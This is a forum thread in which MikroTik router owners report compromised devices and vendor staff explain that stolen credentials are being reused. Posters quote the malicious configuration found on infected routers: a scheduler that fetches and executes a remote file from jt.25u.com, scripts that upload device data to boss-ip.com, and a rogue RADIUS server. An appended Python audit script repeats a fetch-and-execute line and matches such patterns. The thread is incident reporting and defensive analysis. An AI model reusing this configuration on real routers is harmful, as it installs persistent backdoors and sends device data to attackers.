Hi to all, a client called me that something was going wrong on his 1009 router, which is running the latest 6.42.3 version.
By logging in I found two dumped files in the files directory and a lot of changes in the configuration.

Any ideas???
Did you set a (strong) password on the device?
What is the firewall config?
Which services are enabled?
Is there any information in the log?
At least send your findings with supout.rif to support@mikrotik.com.
Your story sounds similar to my own!
I saw one of my servers go offline which was depending on a NAT filter to get its proper external static IP.
Whatever it is, it goes in and adds new admin users, PPP RADIUS connections, IP pools, scripts, and masquerade rules to run every now and again and on startup, which verify the infection of the device, re-infect it if not infected, and from what I can tell upload it... somewhere... not sure how it's getting in but it's nasty.
I checked another 'Tik I know of and it was also affected...
To no coincidence I saw a service tech hanging out of the local large WISP core; he looked to be doing some "maintenance".
Below are some configs that were added by it.
This happened on RB2011 6.41.4 & 6.42.3.
BST
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&dynamic=static\")}"
/system scheduler
add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
]=\"\") do={\r\
\n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
\n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
rif\r\
\n}\r\
\nexecute [/file get autosupout1.rif contents]" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-date=jan/01/1970 start-time=00:00:00
add interval=30m name=a on-event=ip policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-time=startup
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes
I had the same problem: Winbox port blocked except for the network provider, latest version and firmware, strong users and passwords. I noticed this on June 15 at 10pm. It is noteworthy that the services winbox and web were enabled; when I went to see, all services were enabled, and users who had read permission became full. This is disappointing; there is no way to get more secure with MikroTik, one security flaw after the other, in the last 7 vulnerability patch versions.
For the last few months we have been named as vulnerable, but most of the hacks used one and the same vulnerability that was already patched last year. After that we found out about a problem with Winbox that was patched on the same day, and versions with the patch were released on all RouterOS channels. So in total there were two vulnerabilities, and both were fixed. Hackers are using them again and again because many users still have not upgraded and/or fixed their configuration.
Regarding this problem in v6.42.3 - we have received a few reports about this problem, but it seems that a hacker who used the Winbox vulnerability in the past simply stored usernames and passwords and now was able to simply log into your router without hacking.
If you did change usernames and passwords recently while running on the latest RouterOS version and it still seems that you have been hacked, then please without any hesitation contact support@mikrotik.com and provide the supout file from your router (if possible, generate the file before you reboot the router).
This is happening to me also. But the router is a 2 hour flight away... any way to gain access again? I have it working and the configuration seems to be untouched (VPN, EoIP etc.). It was updated to 6.41.3 exactly because of this vulnerability but it didn't help.
It also happened to us on 4 routers; we found that the identity changed to "test" and then we saw all the changes in configuration.
Will appreciate an Official Note from Mikrotik regarding this issue…
At the moment we have not received even one report about an actual new problem.
So far the problem with everyone who has contacted support was:
- The router in the past was running a RouterOS version which had the Winbox vulnerability that allowed a hacker to download the router's user database;
- The router was upgraded, but passwords were not changed and the firewall allowed access to specific enabled service/s;
- The hacker now uses passwords and usernames downloaded in the past and connects to routers in the normal way even though the router is upgraded.
Please make sure that your router's username and password have been changed after an upgrade to a version that has the Winbox vulnerability fix.
I believe 6.41.x doesn’t have any vulnerability fix. You should be using 6.40.8 (or later in 6.40.x series - none yet) or 6.42.1 or later.
So it's not surprising that updating to 6.41.3 doesn't really help. Why pick that one anyway? It's a strange choice at that point in time.
Same problem here; routers were updated to 6.42.3 before getting attacked. We noticed it happened only if the SSH service was enabled on the default port 22.
We found the system identity modified to Test, a scheduled task and a new user called Admin (with a capital A).
What the he…
A. Why would you use the default port? The first thing I did after changing to SSH strong crypto was change the port to anything but the default.
B. Your system may have been hacked prior to your OS change... did you also change usernames and passwords when making the OS update??
Same problem on a lot of RouterOS devices, really strong passwords on every router. All the routers have the latest versions of packages and firmware; I've solved the problem by changing the default service ports and making the firewall rules stronger.
I understand we need to make security stronger ourselves, but if someone can access my router, run scripts etc. without knowing the password... I think MikroTik needs to consider THIS as a problem to solve!
Did you change passwords after you upgraded to latest version?
We got hit with this 2 weeks in a row. The first time they did not change the username and password. We did.
This time we cannot log back into the router although it is still passing traffic.
Identity has changed to test.
Is there a normal username and password that this exploit uses that will allow us back into the router?
Did you do a reinstall after being compromised? Winbox access can be escalated to shell access, where attackers can drop undetectable backdoors and other exploits. Changing passwords might be OK if you’re lucky and didn’t get hit by a sophisticated exploit, but reinstalling is the only truly safe option.
Same here. Identity changed to test and user/password changed. The scan comes from address 62.112.107.230, located in Russia.
Please share more than “same here”… it isn’t helpful at all.
- Have you updated routeros? To which version?
- Have you changed password since this update?
- Have you limited access to Winbox port 8291? If not, can you limit access to the Winbox port?
What do you mean by "scan"? Are there log messages indicating a brute force attack? Could you share these messages?
Besides the above, could you send a supout.rif to support@mikrotik.com with your findings?
HOW is it fixed?
We have the same problem on 6.42.4.
Identity changed to TEST, a scheduler was created to run a script, and the script is:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=36C41FDED4E28E2E3A81E3C9415ED21D&dynamic=static") keep-result=no}
A new user admin is created, and an SSH link is opened from Russia.
We tried to do a clean netinstall and set it back via export... after a few days it is the same situation...
We can't limit access via Winbox. But we have changed the SSH port to another number, and allowed only the www, winbox and ssh services (it's a Hotspot machine).
We have received multiple reports where clients complain that their routers have been "hacked" while running a RouterOS version that has the Winbox vulnerability patch. In each and every one of these cases RouterOS usernames and passwords were not changed, or were changed before an upgrade - not after it. The hacker who stole access credentials simply goes through the routers hacked earlier (while running the old version) and uses the same username and password. This means that the hacker logs into the router as a normal user.
- Upgrade RouterOS
- Change usernames and/or passwords after an upgrade (not before)
- Protect the device with a firewall configuration
If your device has been accessed by an unknown user while running the latest RouterOS version even though access credentials for all users have been changed, then please report to support@mikrotik.com as soon as possible.
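An added example, not from any poster in this thread or from MikroTik: a small Python audit that reads a RouterOS export and flags the indicators described above (identity set to "test", scheduler or script entries that fetch and execute a file, users outside an allow-list, RADIUS servers outside an allow-list). The export text, the allow-lists and the function names are constructed for this example.

```python
import re

# Constructed RouterOS "/export" fragment with the kind of changes the thread
# reports: identity "test", a scheduler that fetches and runs a file, an extra
# user "Admin" and an unknown RADIUS server. Made-up sample, not a real capture.
SAMPLE_EXPORT = r"""
/system identity
set name=test
/system scheduler
add interval=10m name=autosupout on-event="/tool fetch url=\"http://\$ssip:81/a.rif\" \
    dst-path=a.rif; execute [/file get a.rif contents]" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon
/user
add name=Admin group=full
/radius
add address=203.0.113.10 secret=test service=ppp
"""

def join_continuations(text):
    """Fold export lines ending in a backslash (RouterOS line wrapping) into one line."""
    out, buf = [], ""
    for raw in text.splitlines():
        line = raw.lstrip() if buf else raw   # continuation lines are indented
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        out.append((buf + line).strip())
        buf = ""
    return [l for l in out if l]

def audit_export(text, known_users=("admin",), known_radius=()):
    """Return (category, detail) findings for the indicators discussed in the thread."""
    findings, section = [], ""
    for line in join_continuations(text):
        if line.startswith("/"):              # section header, e.g. /system scheduler
            section = line
            continue
        if section == "/system identity" and re.match(r'set name="?test"?$', line, re.I):
            findings.append(("identity", line))
        if section in ("/system scheduler", "/system script") and re.search(r"/tool fetch|execute ", line):
            findings.append(("fetch-and-run", line))   # download-and-run task
        if section == "/user":
            m = re.search(r"name=(\S+)", line)
            if m and m.group(1) not in known_users:
                findings.append(("unexpected-user", m.group(1)))
        if section == "/radius":
            m = re.search(r"address=(\S+)", line)
            if m and m.group(1) not in known_radius:
                findings.append(("unexpected-radius", m.group(1)))
    return findings
```

Run it against the output of `/export` saved from a router; an empty list means none of these particular indicators were found, which is not proof that the device is clean.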